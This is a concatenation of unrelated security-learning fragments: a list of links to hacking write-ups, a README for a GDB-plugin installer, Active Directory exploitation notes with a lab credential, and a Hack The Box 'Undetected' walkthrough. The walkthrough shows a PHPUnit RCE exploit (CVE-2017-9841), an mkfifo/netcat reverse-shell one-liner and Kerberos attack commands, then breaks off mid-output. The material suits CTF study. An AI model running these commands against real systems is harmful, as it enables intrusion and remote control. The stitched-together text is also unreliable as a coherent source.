https://medium.com/bugbountywriteup/angstrom-ctf-2018-web-challenges-writeup-8a69998b0123 -2051-How to get started in CTF | Complete Begineer Guide: https://medium.com/bugbountywriteup/how-to-get-started-in-ctf-complete-begineer-guide-15ab5a6856d -2052-Hacking 101: An Ethical Hackers Guide for Getting from Beginner to Professional: https://medium.com/@gavinloughridge/hacking-101-an-ethical-hackers-guide-for-getting-from-beginner-to-professional-cd1fac182ff1 -2053-Reconnaissance the key to Ethical Hacking!: https://medium.com/techloop/reconnaissance-the-key-to-ethical-hacking-3b853510d977 -2054-Day 18: Essential CTF Tools: https://medium.com/@int0x33/day-18-essential-ctf-tools-1f9af1552214 -2055-OSCP Cheatsheet: https://medium.com/oscp-cheatsheet/oscp-cheatsheet-6c80b9fa8d7e -2056-OSCP Cheat Sheet: https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad -2057-TryHackMe: vulnversity: https://medium.com/@ratiros01/tryhackme-vulnversity-42074b8644df -2058-Malware Analysis Tools And Resources: https://medium.com/@NasreddineBencherchali/malware-analysis-tools-and-resources-16eb17666886 -2059-Extracting Embedded Payloads From Malware: https://medium.com/@ryancor/extracting-embedded-payloads-from-malware-aaca8e9aa1a9 -2060-Attacks and Techniques Used Against WordPress Sites: https://www.trendmicro.com/en_us/research/19/l/looking-into-attacks-and-techniques-used-against-wordpress-sites.html -2061-Still Scanning IP Addresses? You’re Doing it Wrong: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/still-scanning-ip-addresses-you-re-doing-it-wrong/ -2062-Source Code Disclosure via Exposed .git Folder: https://medium.com/dev-genius/source-code-disclosure-via-exposed-git-folder-24993c7561f1 -2063-GitHub Recon - It’s Really Deep: https://medium.com/@shahjerry33/github-recon-its-really-deep-6553d6dfbb1f -2064-From SSRF to Compromise: Case Study: https://trustwave.com/en-us/resources/blogs/spiderlabs-blog/from-ssrf-to-compromise-case-study/ -2065-Bug Hunting with Param Miner: Cache poisoning with XSS, a peculiar case: https://medium.com/bugbountywriteup/cache-poisoning-with-xss-a-peculiar-case-eb5973850814 -2066-Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability: https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/ -2067-Avoiding detection via dhcp options: https://sensepost.com/blog/2020/avoiding-detection-via-dhcp-options/ -2068-Bug Bytes #86 - Stealing local files with Safari, Prototype pollution vs HTML sanitizers & A hacker’s mom learning bug bounty: https://blog.intigriti.com/2020/09/02/bug-bytes-86-stealing-local-files-with-safari-prototype-pollution-vs-html-sanitizers-a-hackers-mom-learning-bug-bounty/ -2069-Bug Bytes #78 - BIG-IP RCE, Azure account takeover & Hunt scanner is back: https://blog.intigriti.com/2020/07/08/bug-bytes-78-big-ip-rce-azure-account-takeover-hunt-scanner-is-back/ -2070-Hacking a Telecommunication company(MTN): https://medium.com/@afolicdaralee/hacking-a-telecommunication-company-mtn-c46696451fed -2071-$20000 Facebook DOM XSS: https://vinothkumar.me/20000-facebook-dom-xss/ -2072-Backdooring WordPress with Phpsploit: https://blog.wpsec.com/backdooring-wordpress-with-phpsploit/ -2073-Pro tips for bugbounty: https://medium.com/@chawdamrunal/pro-tips-for-bug-bounty-f9982a5fc5e9 -2074-Collection Of #bugbountytips: https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248 -2075-Offensive Netcat/Ncat: From Port Scanning To Bind Shell IP Whitelisting: https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da -2076-XSS for beginners: https://medium.com/swlh/xss-for-beginners-6752b1b1487d -2077-LET’S GO DEEP INTO OSINT: PART 1: medium.com/bugbountywriteup/lets-go-deep-into-osint-part-1-c2de4fe4f3bf -2087-Beginner’s Guide to recon automation: medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb -2079-Automating Recon: https://medium.com/@amyrahm786/automating-recon-28b36dc2cf48 -2080-XSS WAF & Character limitation bypass like a boss: https://medium.com/bugbountywriteup/xss-waf-character-limitation-bypass-like-a-boss-2c788647c229 -2081-Chaining Improper Authorization To Race Condition To Harvest Credit Card Details : A Bug Bounty Story: https://medium.com/@ciph3r7r0ll/chaining-improper-authorization-to-race-condition-to-harvest-credit-card-details-a-bug-bounty-effe6e0f5076 -2082-TryHackMe Linux Challenges: https://secjuice.com/write-up-10-tryhackme-linux-challenges-part-1/ -2083-Persistence – COM Hijacking: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ -2084-DLL Proxy Loading Your Favourite C# Implant https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/ -2085-how offensive actors use applescript for attacking macos: https://sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos -2086-Windows Privilege Escalation without Metasploit https://medium.com/@sushantkamble/windows-privilege-escalation-without-metasploit-9bad5fbb5666 -2087-Privilege Escalation in Windows: https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842 -2088-OSWE Prep — Hack The Box Magic: https://medium.com/@ranakhalil101/oswe-prep-hack-the-box-magic-f173e2d09125 -2089-Hackthebox | Bastion Writeup: https://medium.com/@_ncpd/hackthebox-bastion-writeup-9d6f6da3bcbb -2090-Hacking Android phone remotely using Metasploit: https://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8 -2091-“Hacking with Metasploit” Tutorial: https://medium.com/cybersoton/hacking-with-metasploit-tutorial-7635b9d19e5 -2092-Hack The Box — Tally Writeup w/o Metasploit: https://medium.com/@ranakhalil101/hack-the-box-tally-writeup-w-o-metasploit-b8bce0684ad3 -2093-Burp Suite: https://medium.com/cyberdefendersprogram/burp-suite-webpage-enumeration-and-vulnerability-testing-cfd0b140570d -2094-h1–702 CTF — Web Challenge Write Up: https://medium.com/@amalmurali47/h1-702-ctf-web-challenge-write-up-53de31b2ddce -2095-SQL Injection & Remote Code Execution: https://medium.com/@shahjerry33/sql-injection-remote-code-execution-double-p1-6038ca88a2ec -2096-Juicy Infos hidden in js scripts leads to RCE : https://medium.com/@simobalghaoui/juicy-infos-hidden-in-js-scripts-lead-to-rce-5d4abbf24d9c -2097-Escalating Privileges like a Pro: https://gauravnarwani.com/escalating-privileges-like-a-pro/ -2098-Top 16 Active Directory Vulnerabilities: https://www.infosecmatter.com/top-16-active-directory-vulnerabilities/ -2099-Windows Red Team Cheat Sheet: https://morph3sec.com/Cheat-Sheets/Windows-Red-Team-Cheat-Sheet/ -2100-OSCP: Developing a Methodology: https://medium.com/@falconspy/oscp-developing-a-methodology-32f4ab471fd6 -2101-Zero to OSCP: Concise Edition: https://medium.com/@1chidan/zero-to-oscp-concise-edition-b5ecd4a781c3 -2102-59 Hosts to Glory — Passing the OSCP: https://medium.com/@Tib3rius/59-hosts-to-glory-passing-the-oscp-acf0fd384371 -2103-Can We Automate Bug Bounties With Wfuzz? medium.com/better-programming/can-we-automate-earning-bug-bounties-with-wfuzz-c4e7a96810a5 -2104-Advanced boolean-based SQLi filter bypass techniques: https://www.secjuice.com/advanced-sqli-waf-bypass/ -2105-Beginners Guide On How You Can Use Javascript In BugBounty: https://medium.com/@patelkathan22/beginners-guide-on-how-you-can-use-javascript-in-bugbounty-492f6eb1f9ea -2106-OTP Bypass: medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89 -2107-How we Hijacked 26+ Subdomains: https://medium.com/@aishwaryakendle/how-we-hijacked-26-subdomains-9c05c94c7049 -2018-How to spot and exploit postMessage vulnerablities: https://medium.com/bugbountywriteup/how-to-spot-and-exploit-postmessage-vulnerablities-329079d307cc -2119-IDA Pro Tips to Add to Your Bag of Tricks: https://swarm.ptsecurity.com/ida-pro-tips/ -2120-N1QL Injection: Kind of SQL Injection in a NoSQL Database: https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database/ -2121-CSRF Protection Bypass in Play Framework: https://blog.doyensec.com/2020/08/20/playframework-csrf-bypass.html -2122-$25K Instagram Almost XSS Filter Link — Facebook Bug Bounty: https://medium.com/@alonnsoandres/25k-instagram-almost-xss-filter-link-facebook-bug-bounty-798b10c13b83 -2123-techniques for learning passwords: https://rootkitpen.blogspot.com/2020/09/techniques-for-learning-passwords.html -2124-How a simple CSRF attack turned into a P1: https://ladysecspeare.wordpress.com/2020/04/05/how-a-simple-csrf-attack-turned-into-a-p1-level-bug/ -2125-How I exploited the json csrf with method override technique: https://medium.com/@secureITmania/how-i-exploit-the-json-csrf-with-method-override-technique-71c0a9a7f3b0 -2126-How I found CSRF(my first bounty): https://medium.com/@rajeshranjan457/how-i-csrfd-my-first-bounty-a62b593d3f4d -2127-Exploiting websocket application wide XSS and CSRF: https://medium.com/@osamaavvan/exploiting-websocket-application-wide-xss-csrf-66e9e2ac8dfa -2128-Touch ID authentication Bypass on evernote and dropbox iOS apps: https://medium.com/@pig.wig45/touch-id-authentication-bypass-on-evernote-and-dropbox-ios-apps-7985219767b2 -2129-Oauth authentication bypass on airbnb acquistion using wierd 1 char open redirect: https://xpoc.pro/oauth-authentication-bypass-on-airbnb-acquisition-using-weird-1-char-open-redirect/ -2130-Two factor authentication bypass: https://gauravnarwani.com/two-factor-authentication-bypass/ -2132-Tricky oracle SQLI situation: https://blog.yappare.com/2020/04/tricky-oracle-sql-injection-situation.html -2133-CORS bug on google’s 404 page (rewarded): https://medium.com/@jayateerthag/cors-bug-on-googles-404-page-rewarded-2163d58d3c8b -2134-Subdomain takeover via unsecured s3 bucket: https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/ -2135-Subdomain takeover via wufoo service: https://www.mohamedharon.com/2019/02/subdomain-takeover-via-wufoo-service-in.html -2136-How I found CSRF(my first bounty): https://medium.com/@rajeshranjan457/how-i-csrfd-my-first-bounty-a62b593d3f4d -2137-Race condition that could result to RCE a story with an app: https://medium.com/bugbountywriteup/race-condition-that-could-result-to-rce-a-story-with-an-app-that-temporary-stored-an-uploaded-9a4065368ba3 -2138-Creating thinking is our everything : Race condition and business logic: https://medium.com/@04sabsas/bugbounty-writeup-creative-thinking-is-our-everything-race-condition-business-logic-error-2f3e82b9aa17 -2139-Chaining improper authorization to Race condition to harvest credit card details: https://medium.com/@ciph3r7r0ll/chaining-improper-authorization-to-race-condition-to-harvest-credit-card-details-a-bug-bounty-effe6e0f5076 -2140-Google APIs Clickjacking worth 1337$: https://medium.com/@godofdarkness.msf/google-apis-clickjacking-1337-7a3a9f3eb8df -2141-Bypass CSRF with clickjacking on Google org: https://medium.com/@saadahmedx/bypass-csrf-with-clickjacking-worth-1250-6c70cc263f40 -2142-2FA Bypass via logical rate limiting Bypass: https://medium.com/@jeppe.b.weikop/2fa-bypass-via-logical-rate-limiting-bypass-25ae2a4e1835 -2143-OTP bruteforce account takeover: https://medium.com/@ranjitsinghnit/otp-bruteforce-account-takeover-faaac3d712a8 -2144-Microsoft RCE bugbounty: https://blog.securitybreached.org/2020/03/31/microsoft-rce-bugbounty/ -2145-Bug Bounty Tips #1: https://www.infosecmatter.com/bug-bounty-tips-1/ -2146-Bug Bounty Tips #2: https://www.infosecmatter.com/bug-bounty-tips-2-jun-30/ -2147-Bug Bounty Tips #3: https://www.infosecmatter.com/bug-bounty-tips-3-jul-21/ -2148-Bug Bounty Tips #4: https://www.infosecmatter.com/bug-bounty-tips-4-aug-03/ -2149-Bug Bounty Tips #5: https://www.infosecmatter.com/bug-bounty-tips-5-aug-17/ -2150-Bug Bounty Tips #6: https://www.infosecmatter.com/bug-bounty-tips-6-sep-07/ -2151-Finding Bugs in File Systems with an Extensible Fuzzing Framework ﴾TOS 2020﴿: https://wcventure.github.io/FuzzingPaper/Paper/TOS20_FileSys.pdf -2152-PeriScope: An Effective Probing and Fuzzing Framework for the Hardware‐OS Boundary ﴾NDSS2019﴿: https://wcventure.github.io/FuzzingPaper/Paper/NDSS19_PeriScope.pdf -2153-Bug Bounty Tips #7: https://www.infosecmatter.com/bug-bounty-tips-7-sep-27/ -2154-Fuzzing: Hack, Art, and Science ﴾CACM 2020﴿: https://wcventure.github.io/FuzzingPaper/Paper/CACM20_Fuzzing.pdf -2155-Azure File Shares for Pentesters: https://blog.netspi.com/azure-file-shares-for-pentesters/ -2156-XSS like a Pro: https://www.hackerinside.me/2019/12/xss-like-pro.html -2157-XSS on Cookie Pop-up Warning: https://vict0ni.me/bug-hunting-xss-on-cookie-popup-warning/ -2158-Effortlessly finding Cross Site Script Inclusion (XSSI) & JSONP for bug bounty: https://medium.com/bugbountywriteup/effortlessly-finding-cross-site-script-inclusion-xssi-jsonp-for-bug-bounty-38ae0b9e5c8a -2159-XSS in Zoho Mail: https://www.hackerinside.me/2019/09/xss-in-zoho-mail.html -2160-Overview Of Empire 3.4 Features: https://www.bc-security.org/post/overview-of-empire-3-4-features/ -2161-Android App Source code Extraction and Bypassing Root and SSL Pinning checks: https://vj0shii.info/android-app-testing-initial-steps/ -2162-The 3 Day Account Takeover: https://medium.com/@__mr_beast__/the-3-day-account-takeover-269b0075d526 -2163-A Review of Fuzzing Tools and Methods: https://wcventure.github.io/FuzzingPaper/Paper/2017_review.pdf -2164-PeriScope: An Effective Probing and Fuzzing Framework for the Hardware‐OS Boundary ﴾NDSS2019﴿: https://wcventure.github.io/FuzzingPaper/Paper/NDSS19_PeriScope.pdf -2165-Oneplus XSS vulnerability in customer support portal: https://medium.com/@tech96bot/oneplus-xss-vulnerability-in-customer-support-portal-d5887a7367f4 -2166-Windows-Privilege-Escalation-Resources: https://medium.com/@aswingovind/windows-privilege-escalation-resources-d35dca8444de -2167-Persistence – DLL Hijacking: https://pentestlab.blog/page/5/ -2168-Scanning JS Files for Endpoints and Secrets: https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/ -2169-Password Spraying Secure Logon for F5 Networks: https://www.n00py.io/2020/08/password-spraying-secure-logon-for-f5-networks/ -2170-Password Spraying Dell SonicWALL Virtual Office: https://www.n00py.io/2019/12/password-spraying-dell-sonicwall-virtual-office/ -2171-Attention to Details : Finding Hidden IDORs: https://medium.com/@aseem.shrey/attention-to-details-a-curious-case-of-multiple-idors-5a4417ba8848 -2172-Bypassing file upload filter by source code review in Bolt CMS: https://stazot.com/boltcms-file-upload-bypass/ -2173-HTB{ Giddy }: https://epi052.gitlab.io/notes-to-self/blog/2019-02-09-hack-the-box-giddy/ -2174-Analyzing WhatsApp Calls with Wireshark, radare2 and Frida: https://movaxbx.ru/2020/02/11/analyzing-whatsapp-calls-with-wireshark-radare2-and-frida/ -2175-2FA bypass via CSRF attack: https://medium.com/@vbharad/2-fa-bypass-via-csrf-attack-8f2f6a6e3871 -2176-CSRF token bypass [a tale of 2k bug]: https://medium.com/@sainttobs/csrf-token-bypasss-a-tale-of-my-2k-bug-ff7f51166ea1 -2177-Setting the ‘Referer’ Header Using JavaScript: https://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/ -2178-Bug Bytes #91 - The shortest domain, Weird Facebook authentication bypass & GitHub Actions secrets: https://blog.intigriti.com/2020/10/07/bug-bytes-91-the-shortest-domain-weird-facebook-authentication-bypass-github-actions-secrets/ -2179-Stored XSS on Zendesk via Macro’s PART 2: https://medium.com/@hariharan21/stored-xss-on-zendesk-via-macros-part-2-676cefee4616 -2180-Azure Account Hijacking using mimikatz’s lsadump::setntlm: https://www.trustedsec.com/blog/azure-account-hijacking-using-mimikatzs-lsadumpsetntlm/ -2181-CORS misconfiguration account takeover out of scope to grab items in scope: https://medium.com/@mashoud1122/cors-misconfiguration-account-takeover-out-of-scope-to-grab-items-in-scope-66d9d18c7a46 -2182-Razzer: Finding Kernel Race Bugs through Fuzzing ﴾S&P 2019﴿: https://wcventure.github.io/FuzzingPaper/Paper/SP19_Razzer.pdf https://lifeasageek.github.io/papers/jeong-razzer-slides.pdf -2183-Facebook Bug bounty : How I was able to enumerate instagram accounts who had enabled 2FA: https://medium.com/@zk34911/facebook-bug-bounty-how-i-was-able-to-enumerate-instagram-accounts-who-had-enabled-2fa-two-step-fddba9e9741c -2184-Bypass hackerone 2FA: https://medium.com/japzdivino/bypass-hackerone-2fa-requirement-and-reporter-blacklist-46d7959f1ee5 -2185-How I abused 2FA to maintain persistence after password recovery change google microsoft instragram: https://medium.com/@lukeberner/how-i-abused-2fa-to-maintain-persistence-after-a-password-change-google-microsoft-instagram-7e3f455b71a1 -2186-How I hacked 40k user accounts of microsoft using 2FA bypass outlook: https://medium.com/@goyalvartul/how-i-hacked-40-000-user-accounts-of-microsoft-using-2fa-bypass-outlook-live-com-13258785ec2f -2187-How to bypass 2FA with a HTTP header: https://medium.com/@YumiSec/how-to-bypass-a-2fa-with-a-http-header-ce82f7927893 -2188-Building a custom Mimikatz binary: https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/ -2189-Self XSS to Good XSS: https://medium.com/@arbazhussain/self-xss-to-good-xss-clickjacking-6db43b44777e -2190-DOM based XSS or why you should not rely on cloudflare too much: https://medium.com/bugbountywriteup/dom-based-xss-or-why-you-should-not-rely-on-cloudflare-too-much-a1aa9f0ead7d -2191-Reading internal files using SSRF vulnerability: https://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb -2192-Latest web hacking tools: https://portswigger.net/daily-swig/latest-web-hacking-tools-q3-2020 -2193-Cross-Site Scripting (XSS) Cheat Sheet - 2020 Edition: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet -2194-Hijacking a Domain Controller with Netlogon RPC (aka Zerologon: CVE-2020-1472): https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hijacking-a-domain-controller-with-netlogon-rpc-aka-zerologon-cve-2020-1472/ -2195-How I got 1200+ Open S3 buckets…!: https://medium.com/@mail4frnd.mohit/how-i-got-1200-open-s3-buckets-aec347ea2a1e -2196-Open Sesame: Escalating Open Redirect to RCE with Electron Code Review: https://spaceraccoon.dev/open-sesame-escalating-open-redirect-to-rce-with-electron-code-review -2197-When you browse Instagram and find former Australian Prime Minister Tony Abbott's passport number: https://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram -2198-HTB{ Vault }: https://epi052.gitlab.io/notes-to-self/blog/2018-11-04-hack-the-box-vault/ -2199-HTB{ ellingson }: https://epi052.gitlab.io/notes-to-self/blog/2019-09-29-hack-the-box-ellingson/ -2200-HTB{ Swagshop }: https://epi052.gitlab.io/notes-to-self/blog/2019-09-12-hack-the-box-swagshop/ -2201-Evading Firewalls with Tunnels: https://michiana-infosec.com/evading-firewalls-with-tunnels/ -2202-How to Geolocate Mobile Phones (or not): https://keyfindings.blog/2020/07/12/how-to-geolocate-mobile-phones-or-not/ -2203-Web application race conditions: It’s not just for binaries: https://blog.pucarasec.com/2020/07/06/web-application-race-conditions-its-not-just-for-binaries/ -2204-Two-Factor Authentication Bypass: https://gauravnarwani.com/two-factor-authentication-bypass/ -2205-Proxies, Pivots, and Tunnels – Oh My! : https://blog.secureideas.com/2020/10/proxies_pivots_tunnels.html -2206-Let's Debug Together: CVE-2020-9992: https://blog.zimperium.com/c0ntextomy-lets-debug-together-cve-2020-9992/ -2207-I Like to Move It: Windows Lateral Movement Part 3: DLL Hijacking: https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/ -2208-Abusing Chrome's XSS auditor to steal tokens: https://portswigger.net/research/abusing-chromes-xss-auditor-to-steal-tokens -2209-ModSecurity, Regular Expressions and Disputed CVE-2020-15598: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/modsecurity-regular-expressions-and-disputed-cve-2020-15598/ -2210-Bug Bounty Tips #8: https://www.infosecmatter.com/bug-bounty-tips-8-oct-14/ -2211-IOS Pentesing Guide From A N00bs Perspective: https://payatu.com/blog/abhilashnigam/ios-pentesing-guide-from-a-n00bs-perspective.1 -2212-Bug Bytes #92 - Pwning Apple for three months, XSS in VueJS, Hacking Salesforce Lightning & Unicode byͥtes: https://blog.intigriti.com/2020/10/14/bug-bytes-92-pwning-apple-for-three-months-xss-in-vuejs-hacking-salesforce-lightning-unicode-by%cd%a5tes/ -2213-We Hacked Apple for 3 Months: Here’s What We Found: https://samcurry.net/hacking-apple/ -2214-Breaking JCaptcha using Tensorflow and AOCR: https://www.gremwell.com/breaking-jcaptcha-tensorflow-aocr -2215-Bug Bytes #82 - Timeless timing attacks, Grafana SSRF, Pizza & Youtube delicacie: https://blog.intigriti.com/2020/08/05/bug-bytes-82-timeless-timing-attacks-grafana-ssrf-pizza-youtube-delicacies/ -2216-Bug Bytes #71 – 20K Facebook XSS, LevelUp 0x06 &Naffy’s Notes: https://blog.intigriti.com/2020/05/20/bug-bytes-71-20k-facebook-xss-levelup-0x06-naffys-notes/ -2217-Bug Bytes #90 - The impossible XSS, Burp Pro tips & A millionaire on bug bounty and meditation: https://blog.intigriti.com/2020/09/30/bug-bytes-90-the-impossible-xss-burp-pro-tips-a-millionaire-on-bug-bounty-and-meditation/ -2218-How to Find Vulnerabilities in Code: Bad Words: https://btlr.dev/blog/how-to-find-vulnerabilities-in-code-bad-words -2219-Testing for WebSockets security vulnerabilities: https://portswigger.net/web-security/websockets -2220-Practical Web Cache Poisoning: https://portswigger.net/research/practical-web-cache-poisoning -2221-htb{ zipper }: https://epi052.gitlab.io/notes-to-self/blog/2018-10-22-hack-the-box-zipper/ -2222-What is HTTP request smuggling? Tutorial & Examples: https://portswigger.net/web-security/request-smuggling -2223-When alert fails: exploiting transient events: https://portswigger.net/research/when-alert-fails-exploiting-transient-events -2224-BugPoC LFI Challeng: https://hipotermia.pw/bb/bugpoc-lfi-challenge -2225-Misc CTF - Request Smuggling: https://hg8.sh/posts/misc-ctf/request-smuggling/ -2226-403 to RCE in XAMPP: https://www.securifera.com/blog/2020/10/13/403-to-rce-in-xampp/ -2227-Phone numbers investigation, the open source way: https://www.secjuice.com/phone-numbers-investigation-the-open-source-way/ -2228-Covert Web Shells in .NET with Read-Only Web Paths: https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/ -2229-From Static Analysis to RCE: https://blog.dixitaditya.com/from-android-app-to-rce/ -2230-GitHub Pages - Multiple RCEs via insecure Kramdown configuration - $25,000 Bounty: https://devcraft.io/2020/10/20/github-pages-multiple-rces-via-kramdown-config.html -2231-Signed Binary Proxy Execution via PyCharm: https://www.archcloudlabs.com/projects/signed_binary_proxy_execution/ -2232-Bug Bytes #93 - Discord RCE, Vulnerable HTML to PDF converters & DOMPurify bypass demystified : https://blog.intigriti.com/2020/10/21/bug-bytes-93-discord-rce-vulnerable-html-to-pdf-converters-dompurify-bypass-demystified/ -2233-Bug Bytes #94 - Breaking Symfony apps, Why Cyber Security is so hard to learn & how best to approach it: https://blog.intigriti.com/2020/10/28/bug-bytes-94-breaking-symfony-apps-why-cyber-security-is-so-hard-to-learn-how-best-to-approach-it/ -2234-Advanced Level Resources For Web Application Penetration Testing: https://twelvesec.com/2020/10/19/advanced-level-resources-for-web-application-penetration-testing/ -2235-Pass-the-hash wifi: https://sensepost.com/blog/2020/pass-the-hash-wifi/ -2236-HTML to PDF converters, can I hack them?: https://sidechannel.tempestsi.com/html-to-pdf-converters-can-i-hack-them-a681cfee0903 -2237-Android adb reverse tethering mitm setup: https://www.securify.nl/blog/android-adb-reverse-tethering-mitm-setup/ -2238-Typical Wi-Fi attacks: https://splone.com/blog/2020/10/13/typical-wi-fi-attacks/ -2239-Burp suite “ninja moves”: https://owasp.org/www-chapter-norway/assets/files/Burp%20suite%20ninja%20moves.pdf -2240-Razzer: Finding Kernel Race Bugs through Fuzzing ﴾S&P 2019﴿: Paper:https://wcventure.github.io/FuzzingPaper/Paper/SP19_Razzer.pdf Code:https://github.com/compsec-snu/razzer Slides:https://lifeasageek.github.io/papers/jeong-razzer-slides.pdf -2241-MoonShine: Optimizing OS Fuzzer Seed Selection with Trace Distillation ﴾USENIX Security2018﴿: Paper:https://wcventure.github.io/FuzzingPaper/Paper/USENIX18_MoonShine.pdf -2242-Sequence directed hybrid fuzzing ﴾SANER 2020﴿: Paper:https://wcventure.github.io/FuzzingPaper/Paper/SANER20_Sequence.pdf
# Pwndbg + GEF + Peda - One for all, and all for one This is a script which installs Pwndbg, GEF, and Peda GDB plugins in a single command. Run `install.sh` and then use one of the commands below to launch the corresponding GDB environment: ``` gdb-peda gdb-peda-intel gdb-peda-arm gdb-pwndbg gdb-gef ``` For more information read the relevant blog post: https://medium.com/bugbountywriteup/pwndbg-gef-peda-one-for-all-and-all-for-one-714d71bf36b8 # Installation ``` cd ~ && git clone https://github.com/apogiatzis/gdb-peda-pwndbg-gef.git cd ~/gdb-peda-pwndbg-gef ./install.sh ``` ## Update ``` ./update.sh ```
## Notes MS14-068 ------ add htb.local and mantis.htb.local to /etc/hosts impacket goldenpac <= 9.18 works, 9.19 does not work on mantis, or use pykek ms14-068<br/> ``` goldenPac.py htb.local/james:J@m3s_P@ssW0rd\[email protected] python2 ms14-068.py -u [email protected] -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local rpcclient -U james 10.10.10.52 ``` htb mantis: [LINK-1](https://medium.com/secjuice/hackthebox-mantis-writeup-9c2b50c4b30b) [LINK-2](https://alamot.github.io/mantis_writeup/) Juicy Potato ------ [https://github.com/ohpe/juicy-potato/releases](https://github.com/ohpe/juicy-potato/releases) <br/> `whoami /priv` has `SeImpersonatePrivilege` need CLSID, pick ones with NT AUTHORITY\SYSTEM : [CLSID](https://github.com/ohpe/juicy-potato/tree/master/CLSID) htb conceal: [LINK-1](https://0xrick.github.io/hack-the-box/conceal/) [LINK-2](https://hackso.me/conceal-htb-walkthrough/)
# Undetected - HackTheBox - Writeup Linux, 30 Base Points, Medium ![info.JPG](images/info.JPG) ## Machine ![‏‏Undetected.JPG](images/Undetected.JPG) ## TL;DR To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22``` and ```80```. ***User***: On ```/vendor``` found ```phpunit```, Using ```CVE-2017-9841``` to get RCE, Using that we get a reverse shell as ```www-data```, Found file ```/var/backups/info```, ```strings``` on this file shows base64 string which contains the hashed password of the new user was created, decrypt the hash and we get the password of ```steven1``` user. ***Root***: By reading the mails of ```steven``` we found a hint about the ```Apache``` service, Found an odd module on ```/lib/apache2/modules``` directory, ```strings``` on this module and we found base64 strings which show the attacker replaces ```/usr/sbin/sshd``` file, decompiling this file and we found the password on ```auth_password``` function (need to XOR it before) and we get the root password. ![pwn.JPG](images/pwn.JPG) ## Undetected Solution ### User Let's start with ```nmap``` scanning: ```console ┌─[evyatar@parrot]─[/hackthebox/Undetected] └──╼ $ nmap -sV -sC -oA nmap/Undetected 10.10.11.146 Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-06 01:42 IDT Nmap scan report for 10.10.11.146 Host is up (0.19s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Diana's Jewelry ``` By observing port 80 we get the following web page: ![port80.JPG](images/port80.JPG) [Store](http://store.djewelry.htb/) button linked to [http://store.djewelry.htb/](http://store.djewelry.htb/). Let's add ```store.djewelry.htb``` and ```djewelry.htb``` to ```/etc/hosts/``` file ad click on [Store](http://store.djewelry.htb/) button: ![store.JPG](images/store.JPG) By running ```gobuster``` we found the following: ```console ┌─[evyatar@parrot]─[/hackthebox/Undetected] └──╼ $ gobuster dir -u http://djewelry.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -k --wildcard -s 403 =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://djewelry.htb [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/05/06 14:40:53 Starting gobuster in directory enumeration mode =============================================================== .... /vendor (Status: 200) [Size: 15283] ``` And by observing to [http://djewelry.htb/vendor](http://djewelry.htb/vendor) we can see: ![vendor.JPG](images/vendor.JPG) After research we found that ```phpunit``` is vulenrable: ![phpunit.JPG](images/phpunit.JPG) We can use the following exploit [https://www.exploit-db.com/exploits/50702](https://www.exploit-db.com/exploits/50702) (CVE-2017-9841): ```console ┌─[evyatar@parrot]─[/hackthebox/Undetected] └──╼ $ python3 exp.py http://store.djewelry.htb Vulnerable: http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php > id uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` And we get RCE. Let's run the following to get a reverse shell: ```console > rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4242 >/tmp/f ``` And we get a reverse shell: ```console ┌─[evyatar@parrot]─[/hackthebox/Undetected] └──╼ $ nc -lvp 4242 listening on [any] 4242 ... connect to [10.10.14.14] from store.djewelry.htb [10.10.11.146] 54046 /bin/sh: 0: can't access tty; job control turned off $ ``` By enumerating we found the following file owned by ```www-data```: ```console $ ls -ltr /var/backups/info -r-x------ 1 www-data www-data 27296 May 14 2021 /var/backups/info ``` Let's get this file and run ```strings``` on this file: ```console ┌─[evyatar@parrot]─[/hackthebox/Undetected] └──╼ $ strings info /lib64/ld-linux-x86-64.so.2 tv5n ^X<h klogctl socket exit htons perror puts fork tolower mmap sched_setaffinity strlen unshare memset bind getpagesize vsnprintf strtoul setsockopt getgid stderr system getuid execve if_nametoindex close open 